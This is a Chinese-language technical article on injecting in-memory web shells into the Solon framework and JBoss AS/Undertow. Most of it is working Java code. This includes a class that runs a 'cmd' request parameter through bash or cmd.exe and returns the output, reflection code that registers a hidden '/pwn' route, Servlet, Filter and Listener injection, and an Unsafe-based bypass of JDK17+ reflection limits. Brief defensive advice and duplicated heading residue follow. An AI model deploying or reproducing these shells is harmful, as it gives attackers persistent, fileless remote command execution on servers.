Solon框架内存马注入技术深入分析<\/h1>

一、Handler内存马注入技术<\/h2>

1. Solon路由机制分析<\/h3>
Solon框架通过RouterHandler<\/code>类的handle<\/code>方法处理请求，其中this.router<\/code>存储了所有路径信息：<\/p>

routesH<\/code>数组存储RoutingDefault<\/code>对象<\/li>
每个RoutingDefault<\/code>包含路径、请求方式和对应的Handler<\/code>实现<\/li>
ActionDefault<\/code>是Handler<\/code>的实现类，存储了处理类和方法信息<\/li>
<\/ul>
2. 动态路由注入原理<\/h3>
通过反射获取RouterDefault<\/code>实例后，可以动态添加路由：<\/p>

创建恶意类，包含攻击逻辑<\/li>
获取RouterDefault<\/code>和AppContext<\/code>对象<\/li>
构造ActionDefault<\/code>对象<\/li>
调用RouterDefault.add()<\/code>方法注册新路由<\/li>
<\/ol>
3. 完整注入代码实现<\/h3>
\/\/ 1. 创建恶意类
<\/span><\/span><\/span><\/span>public<\/span> static<\/span> class<\/span> MemShell<\/span> {<\/span>
<\/span><\/span>    public<\/span> void<\/span> pwn<\/span>()<\/span> {<\/span>
<\/span><\/span>        Context ctx =<\/span> Context.<\/span>current<\/span>();<\/span>
<\/span><\/span>        try<\/span> {<\/span>
<\/span><\/span>            if<\/span>(<\/span>ctx.<\/span>param<\/span>(<\/span>"cmd"<\/span>)!=<\/span>null<\/span>)<\/span> {<\/span>
<\/span><\/span>                String str =<\/span> ctx.<\/span>param<\/span>(<\/span>"cmd"<\/span>);<\/span>
<\/span><\/span>                try<\/span> {<\/span>
<\/span><\/span>                    String[]<\/span> cmds =<\/span> System.<\/span>getProperty<\/span>(<\/span>"os.name"<\/span>).<\/span>toLowerCase<\/span>().<\/span>contains<\/span>(<\/span>"win"<\/span>)<\/span> ?<\/span> 
<\/span><\/span>                        new<\/span> String[]{<\/span>"cmd.exe"<\/span>,<\/span> "\/c"<\/span>,<\/span> str}<\/span> :<\/span> 
<\/span><\/span>                        new<\/span> String[]{<\/span>"\/bin\/bash"<\/span>,<\/span> "-c"<\/span>,<\/span> str};<\/span>
<\/span><\/span>                    String output =<\/span> new<\/span> java.<\/span>util<\/span>.<\/span>Scanner<\/span>(<\/span>
<\/span><\/span>                        new<\/span> ProcessBuilder(<\/span>cmds).<\/span>start<\/span>().<\/span>getInputStream<\/span>()<\/span>
<\/span><\/span>                    ).<\/span>useDelimiter<\/span>(<\/span>"\\A"<\/span>).<\/span>next<\/span>();<\/span>
<\/span><\/span>                    ctx.<\/span>output<\/span>(<\/span>output);<\/span>
<\/span><\/span>                }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span>
<\/span><\/span>                    e.<\/span>printStackTrace<\/span>();<\/span>
<\/span><\/span>                }<\/span>
<\/span><\/span>            }<\/span>
<\/span><\/span>        }<\/span> catch<\/span> (<\/span>Throwable e)<\/span> {<\/span>
<\/span><\/span>            ctx.<\/span>output<\/span>(<\/span>e.<\/span>getMessage<\/span>());<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 2. 获取关键对象
<\/span><\/span><\/span><\/span>Context ctx =<\/span> Context.<\/span>current<\/span>();<\/span>
<\/span><\/span>Object _request =<\/span> getfieldobj(<\/span>ctx,<\/span>"_request"<\/span>);<\/span>
<\/span><\/span>Object request =<\/span> getfieldobj(<\/span>_request,<\/span>"request"<\/span>);<\/span>
<\/span><\/span>Object serverHandler =<\/span> getfieldobj(<\/span>request,<\/span>"serverHandler"<\/span>);<\/span>
<\/span><\/span>Object handler =<\/span> getfieldobj(<\/span>serverHandler,<\/span>"handler"<\/span>);<\/span>
<\/span><\/span>Object arg$1 =<\/span> getfieldobj(<\/span>handler,<\/span>"arg$1"<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>AppContext appContext =<\/span> (<\/span>AppContext)<\/span> getfieldobj(<\/span>arg$1,<\/span>"_context"<\/span>);<\/span>
<\/span><\/span>RouterDefault _router =<\/span> (<\/span>RouterDefault)<\/span> getfieldobj(<\/span>arg$1,<\/span>"_router"<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 3. 注册内存马
<\/span><\/span><\/span><\/span>BeanWrap beanWrap =<\/span> new<\/span> BeanWrap(<\/span>appContext,<\/span> MemShell.<\/span>class<\/span>);<\/span>
<\/span><\/span>Method method =<\/span> MemShell.<\/span>class<\/span>.<\/span>getDeclaredMethod<\/span>(<\/span>"pwn"<\/span>);<\/span>
<\/span><\/span>Handler newhandler =<\/span> new<\/span> ActionDefault(<\/span>beanWrap,<\/span> method);<\/span>
<\/span><\/span>_router.<\/span>add<\/span>(<\/span>"\/pwn"<\/span>,<\/span> MethodType.<\/span>ALL<\/span>,<\/span> newhandler);<\/span>
<\/span><\/span><\/code><\/pre>二、JBoss AS中间件内存马注入<\/h2>
1. Servlet内存马注入<\/h3>
注入原理<\/h4>

获取Deployment<\/code>和DeploymentInfo<\/code>对象<\/li>
创建ServletInfo<\/code>对象配置Servlet信息<\/li>
通过deploymentInfo.addServlet()<\/code>和deployment.getServlets().addServlet()<\/code>注册<\/li>
<\/ol>
实现代码<\/h4>
\/\/ 获取关键对象
<\/span><\/span><\/span><\/span>Object o =<\/span> getCurrentThreadObj(<\/span>"io.undertow.servlet.handlers.ServletRequestContext"<\/span>);<\/span>
<\/span><\/span>Deployment deployment =<\/span> (<\/span>Deployment)<\/span> getfieldobj(<\/span>o,<\/span> "deployment"<\/span>);<\/span>
<\/span><\/span>DeploymentInfo deploymentInfo =<\/span> deployment.<\/span>getDeploymentInfo<\/span>();<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 创建并注册Servlet
<\/span><\/span><\/span><\/span>ServletInfo servletInfo =<\/span> new<\/span> ServletInfo(<\/span>"ServletMemShell"<\/span>,<\/span> MemServlet.<\/span>class<\/span>).<\/span>addMapping<\/span>(<\/span>"\/S"<\/span>);<\/span>
<\/span><\/span>deploymentInfo.<\/span>addServlet<\/span>(<\/span>servletInfo);<\/span>
<\/span><\/span>deployment.<\/span>getServlets<\/span>().<\/span>addServlet<\/span>(<\/span>servletInfo);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 恶意Servlet类
<\/span><\/span><\/span><\/span>public<\/span> static<\/span> class<\/span> MemServlet<\/span> extends<\/span> HttpServlet {<\/span>
<\/span><\/span>    @Override<\/span>
<\/span><\/span>    public<\/span> void<\/span> service<\/span>(<\/span>ServletRequest req,<\/span> ServletResponse res)<\/span> throws<\/span> ServletException,<\/span> IOException {<\/span>
<\/span><\/span>        res.<\/span>setContentType<\/span>(<\/span>"text\/html;charset=utf-8"<\/span>);<\/span>
<\/span><\/span>        res.<\/span>getWriter<\/span>().<\/span>write<\/span>(<\/span>"MemServlet\n"<\/span>);<\/span>
<\/span><\/span>        \/\/ 攻击逻辑...
<\/span><\/span><\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>2. Filter内存马注入<\/h3>
注入原理<\/h4>

获取Deployment<\/code>和DeploymentInfo<\/code>对象<\/li>
创建FilterInfo<\/code>对象<\/li>
通过deploymentInfo.addFilter()<\/code>和deployment.getFilters().addFilter()<\/code>注册<\/li>
使用deploymentInfo.insertFilterUrlMapping()<\/code>设置过滤路径<\/li>
<\/ol>
实现代码<\/h4>
FilterInfo filterInfo =<\/span> new<\/span> FilterInfo(<\/span>"FilterMemShell"<\/span>,<\/span> MemFilter.<\/span>class<\/span>);<\/span>
<\/span><\/span>deploymentInfo.<\/span>addFilter<\/span>(<\/span>filterInfo);<\/span>
<\/span><\/span>deploymentInfo.<\/span>insertFilterUrlMapping<\/span>(<\/span>0<\/span>,<\/span> "FilterMemShell"<\/span>,<\/span> "\/hello\/*"<\/span>,<\/span> DispatcherType.<\/span>REQUEST<\/span>);<\/span>
<\/span><\/span>deployment.<\/span>getFilters<\/span>().<\/span>addFilter<\/span>(<\/span>filterInfo);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 恶意Filter类
<\/span><\/span><\/span><\/span>public<\/span> static<\/span> class<\/span> MemFilter<\/span> implements<\/span> Filter {<\/span>
<\/span><\/span>    @Override<\/span>
<\/span><\/span>    public<\/span> void<\/span> doFilter<\/span>(<\/span>ServletRequest request,<\/span> ServletResponse response,<\/span> FilterChain chain)<\/span> throws<\/span> IOException,<\/span> ServletException {<\/span>
<\/span><\/span>        \/\/ 攻击逻辑...
<\/span><\/span><\/span><\/span>        chain.<\/span>doFilter<\/span>(<\/span>request,<\/span> response);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>3. Listener内存马注入<\/h3>
注入原理<\/h4>

获取Deployment<\/code>和DeploymentInfo<\/code>对象<\/li>
创建ListenerInfo<\/code>对象<\/li>
通过deploymentInfo.addListener()<\/code>注册<\/li>
使用deployment.getApplicationListeners().addListener()<\/code>添加监听器<\/li>
<\/ol>
实现代码<\/h4>
ListenerInfo listenerInfo =<\/span> new<\/span> ListenerInfo(<\/span>MemListener.<\/span>class<\/span>);<\/span>
<\/span><\/span>deploymentInfo.<\/span>addListener<\/span>(<\/span>listenerInfo);<\/span>
<\/span><\/span>ManagedListener managedListener =<\/span> new<\/span> ManagedListener(<\/span>listenerInfo,<\/span> false<\/span>);<\/span>
<\/span><\/span>deployment.<\/span>getApplicationListeners<\/span>().<\/span>addListener<\/span>(<\/span>managedListener);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 恶意Listener类
<\/span><\/span><\/span><\/span>public<\/span> class<\/span> MemListener<\/span> implements<\/span> ServletRequestListener {<\/span>
<\/span><\/span>    @Override<\/span>
<\/span><\/span>    public<\/span> void<\/span> requestInitialized<\/span>(<\/span>ServletRequestEvent sre)<\/span> {<\/span>
<\/span><\/span>        try<\/span> {<\/span>
<\/span><\/span>            \/\/ 绕过JDK17+反射限制
<\/span><\/span><\/span><\/span>            bypassreflect(<\/span>MemListener.<\/span>class<\/span>);<\/span>
<\/span><\/span>            Object o =<\/span> getCurrentThreadObj(<\/span>"io.undertow.servlet.handlers.ServletRequestContext"<\/span>);<\/span>
<\/span><\/span>            HttpServletResponseImpl response =<\/span> (<\/span>HttpServletResponseImpl)<\/span> getfieldobj(<\/span>o,<\/span> "originalResponse"<\/span>);<\/span>
<\/span><\/span>            response.<\/span>getWriter<\/span>().<\/span>write<\/span>(<\/span>"MemListener!!!"<\/span>);<\/span>
<\/span><\/span>        }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span>
<\/span><\/span>            e.<\/span>printStackTrace<\/span>();<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    public<\/span> void<\/span> bypassreflect<\/span>(<\/span>Class currentClass)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        Class unsafeClass =<\/span> Class.<\/span>forName<\/span>(<\/span>"sun.misc.Unsafe"<\/span>);<\/span>
<\/span><\/span>        Field field =<\/span> unsafeClass.<\/span>getDeclaredField<\/span>(<\/span>"theUnsafe"<\/span>);<\/span>
<\/span><\/span>        field.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        Unsafe unsafe =<\/span> (<\/span>Unsafe)<\/span> field.<\/span>get<\/span>(<\/span>null<\/span>);<\/span>
<\/span><\/span>        Module baseModule =<\/span> Object.<\/span>class<\/span>.<\/span>getModule<\/span>();<\/span>
<\/span><\/span>        long<\/span> addr =<\/span> unsafe.<\/span>objectFieldOffset<\/span>(<\/span>Class.<\/span>class<\/span>.<\/span>getDeclaredField<\/span>(<\/span>"module"<\/span>));<\/span>
<\/span><\/span>        unsafe.<\/span>getAndSetObject<\/span>(<\/span>currentClass,<\/span> addr,<\/span> baseModule);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>三、关键工具方法<\/h2>
1. 反射工具方法<\/h3>
\/\/ 获取字段值
<\/span><\/span><\/span><\/span>public<\/span> Object getfieldobj<\/span>(<\/span>Object obj,<\/span> String fieldname)<\/span> throws<\/span> NoSuchFieldException,<\/span> IllegalAccessException {<\/span>
<\/span><\/span>    try<\/span> {<\/span>
<\/span><\/span>        Field field =<\/span> obj.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>fieldname);<\/span>
<\/span><\/span>        field.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        return<\/span> field.<\/span>get<\/span>(<\/span>obj);<\/span>
<\/span><\/span>    }<\/span> catch<\/span> (<\/span>NoSuchFieldException e)<\/span> {<\/span>
<\/span><\/span>        Field field =<\/span> obj.<\/span>getClass<\/span>().<\/span>getSuperclass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>fieldname);<\/span>
<\/span><\/span>        field.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        return<\/span> field.<\/span>get<\/span>(<\/span>obj);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 从当前线程获取对象
<\/span><\/span><\/span><\/span>public<\/span> Object getCurrentThreadObj<\/span>(<\/span>String classname)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>    Thread currentThread =<\/span> Thread.<\/span>currentThread<\/span>();<\/span>
<\/span><\/span>    Object threadLocals =<\/span> getfieldobj(<\/span>currentThread,<\/span> "threadLocals"<\/span>);<\/span>
<\/span><\/span>    Object[]<\/span> table =<\/span> (<\/span>Object[])<\/span> getfieldobj(<\/span>threadLocals,<\/span> "table"<\/span>);<\/span>
<\/span><\/span>    for<\/span> (<\/span>int<\/span> i =<\/span> 0<\/span>;<\/span> i <<\/span> table.<\/span>length<\/span>;<\/span> i++)<\/span> {<\/span>
<\/span><\/span>        Object tmpobj =<\/span> table[<\/span>i];<\/span>
<\/span><\/span>        if<\/span> (<\/span>tmpobj ==<\/span> null<\/span>)<\/span> continue<\/span>;<\/span>
<\/span><\/span>        Object obj =<\/span> getfieldobj(<\/span>tmpobj,<\/span> "value"<\/span>);<\/span>
<\/span><\/span>        if<\/span> (<\/span>obj !=<\/span> null<\/span> &&<\/span> obj.<\/span>getClass<\/span>().<\/span>getName<\/span>().<\/span>equals<\/span>(<\/span>classname))<\/span> {<\/span>
<\/span><\/span>            return<\/span> obj;<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    return<\/span> null<\/span>;<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>四、防护建议<\/h2>

监控Solon框架中动态添加的路由<\/li>
检查DeploymentInfo<\/code>中新增的Servlet、Filter和Listener<\/li>
限制反射操作，特别是Unsafe<\/code>类的使用<\/li>
实施运行时字节码检测，识别恶意类加载<\/li>
定期更新框架版本，修复已知漏洞<\/li>
<\/ol>
五、参考资源<\/h2>

Solon框架官方文档<\/a><\/li>
Java内存马技术分析<\/a><\/li>
<\/ol>
Solon框架内存马注入技术深入分析<\/h1>

一、Handler内存马注入技术<\/h2>

二、JBoss AS中间件内存马注入<\/h2>

1. Servlet内存马注入<\/h3>

2. Filter内存马注入<\/h3>

3. Listener内存马注入<\/h3>

三、关键工具方法<\/h2>

五、参考资源<\/h2> Solon框架官方文档<\/a><\/li> Java内存马技术分析<\/a><\/li> <\/ol>

五、参考资源<\/h2>

Solon框架官方文档<\/a><\/li>
Java内存马技术分析<\/a><\/li> <\/ol>
